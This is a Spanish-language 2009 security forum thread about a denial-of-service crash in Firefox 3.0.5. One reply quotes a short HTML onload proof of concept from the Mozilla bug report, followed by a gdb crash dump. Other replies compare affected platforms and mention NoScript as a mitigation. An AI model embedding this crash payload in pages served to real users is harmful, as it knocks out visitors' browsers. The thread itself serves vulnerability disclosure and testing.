Nuevo DoS sobre Firefox 3.0.5 + PoC

Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

Nuevo DoS sobre Firefox 3.0.5 + PoC

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Nuevo DoS sobre Firefox 3.0.5 + PoC (Leído 3,118 veces)

berz3k

Moderador

Desconectado

Mensajes: 1.140

Nuevo DoS sobre Firefox 3.0.5 + PoC

« en: 14 Enero 2009, 06:45 »

Exploit:

FireFox 3.0.5 // Windows Vista

Código:

Testing Version

Código:

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

Bug & Source reportado en:
https://bugzilla.mozilla.org/show_bug.cgi?id=456727

Source:

-berz3k.


« Última modificación: 14 Enero 2009, 06:54 por berz3k »	En línea

AlbertoBSD

Estudiante y
Colaborador

Desconectado

Mensajes: 1.955

Anonymous & Paranoid

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #1 en: 15 Enero 2009, 05:37 »

Pues si, al parecer cualquier Firefox 3.0.5 va a terminar siendo vulnerable.

Citar

Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.5) Gecko/2008121922 Firefox/3.0.5

Bien lo dice la web:

Citar

Reproducible: Always

Steps to Reproduce:
1. Load the supplied URL in FireFox 3
or
1. Create a HTML file with this contents:
<BODY onload="
document.designMode='on';
document.replaceChild(document.createElement('HTML'), document.firstChild);
document.queryCommandValue('backcolor');
">
2. Load the file in FireFox 3.

Actual Results:
NULL pointer Access Violation

Lo ultimo: NULL pointer Access Violation en mi casi si trato de saltar a algun lugar de la memoria, sin embargo no se como maneje la memoria cargada, por lo tanto no se si sea controlable.

Código

Anon@localhost % gdb `where is firefox3` ./firefox-bin.core 
GNU gdb 6.1.1 [FreeBSD]
...
Core was generated by `firefox-bin`.
Program terminated with signal 11, Segmentation fault.
#0  0x299dd5cb in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x2	2
edx            0xbfbfc4cc	-1077951284
ebx            0x2999672c	697919276
esp            0xbfbfc47c	0xbfbfc47c
ebp            0xbfbfc498	0xbfbfc498
esi            0xb	11
edi            0xb	11
eip            0x299dd5cb	0x299dd5cb
eflags         0x212	530
cs             0x33	51
ss             0x3b	59
ds             0x3b	59
es             0x3b	59
fs             0x3b	59
gs             0x1b	27
(gdb) bt
#0  0x299dd5cb in ?? ()
#1  0x29991386 in ?? ()
#2  0x00018731 in ?? ()
#3  0x0000000b in ?? ()
...

Seguiré Investigando

Saludos.


	En línea

Bien Super Divertido
@wifigdlmx

jdc

Desconectado

Mensajes: 3.253

janito dos cuatro...

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #2 en: 15 Enero 2009, 06:25 »

Probado en firefox 3.0.5 / XP y muere al igual que en UBUNTU.

Saludos.

PD: NOSCRIPT bloquea el bug


	En línea

Aplicaciones para Android

Vaati

Desconectado

Mensajes: 229

NULL

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #3 en: 15 Enero 2009, 06:48 »

Cita de: el-pollo link=topic=241599.msg1159164#msg1159164
PD: NOSCRIPT bloquea el bug

[/quote

Por suerte lo tengo ::)


	En línea

AlbertoBSD

Estudiante y
Colaborador

Desconectado

Mensajes: 1.955

Anonymous & Paranoid

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #4 en: 15 Enero 2009, 07:13 »

Yo también tengo el noscript, sin embargo no me lo bloqueo.... bueno ahora que lo pienso es por que tengo a localhost entre los sitios seguros

.

Lo bueno que es de los pocos que estan el la lista blanca.

Saludos.


	En línea

Bien Super Divertido
@wifigdlmx

jdc

Desconectado

Mensajes: 3.253

janito dos cuatro...

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #5 en: 15 Enero 2009, 07:21 »

Ajá... El tema es que no es sólo para Vista, y como solucionarlo no? Seguro que será con una versión 3.0.6 xD aunque sinceramente no le veo la gravedad, igual que el ataque de DoS al IE, sólo resultaría molesto


	En línea

Aplicaciones para Android

berz3k

Moderador

Desconectado

Mensajes: 1.140

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #6 en: 21 Enero 2009, 01:57 »

Aun con noscript se puede saltar con ciertos tricks! si no preguntar a sdc XD

-berz3k.


	En línea

IWKY

Desconectado

Mensajes: 269

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #7 en: 24 Enero 2009, 15:54 »

En Mac OS X también peta.


	En línea

Por internet libre http://red-sostenible.net/
El mejor momento de Dragon Ball Z --> Aqui

AlbertoBSD

Estudiante y
Colaborador

Desconectado

Mensajes: 1.955

Anonymous & Paranoid

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #8 en: 24 Enero 2009, 16:01 »

A valla que bien, ya decían en el advisor que siempre hiva a suceder.

Saludos.


	En línea

Bien Super Divertido
@wifigdlmx

berz3k

Moderador

Desconectado

Mensajes: 1.140

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #9 en: 27 Enero 2009, 22:47 »

Probe en Slakware mmmm no rompe, alguien mas ha probado en Linux, ademas del Ubunto que postea el-pollo?

-berz3k.


	En línea

AlbertoBSD

Estudiante y
Colaborador

Desconectado

Mensajes: 1.955

Anonymous & Paranoid

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #10 en: 29 Enero 2009, 07:03 »

No tengo slakware en este momento a mi también me interesa testearlo, sin embargo todos son DoS.

@berz3k

Por que no pones el User-Agent a ver que tiene alguna diferencia.

Saludos


	En línea

Bien Super Divertido
@wifigdlmx

berz3k

Moderador

Desconectado

Mensajes: 1.140

Re: Nuevo DoS sobre Firefox 3.0.5 + PoC

« Respuesta #11 en: 29 Enero 2009, 18:06 »

Ya me rompio XDD lo codee mal en, se me fue un ; muhaha

-berz3k.


	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Sobre ELENA, nuevo desacelerador de antiprotones Noticias	wolfbcn	0	765	26 Octubre 2011, 18:06 por wolfbcn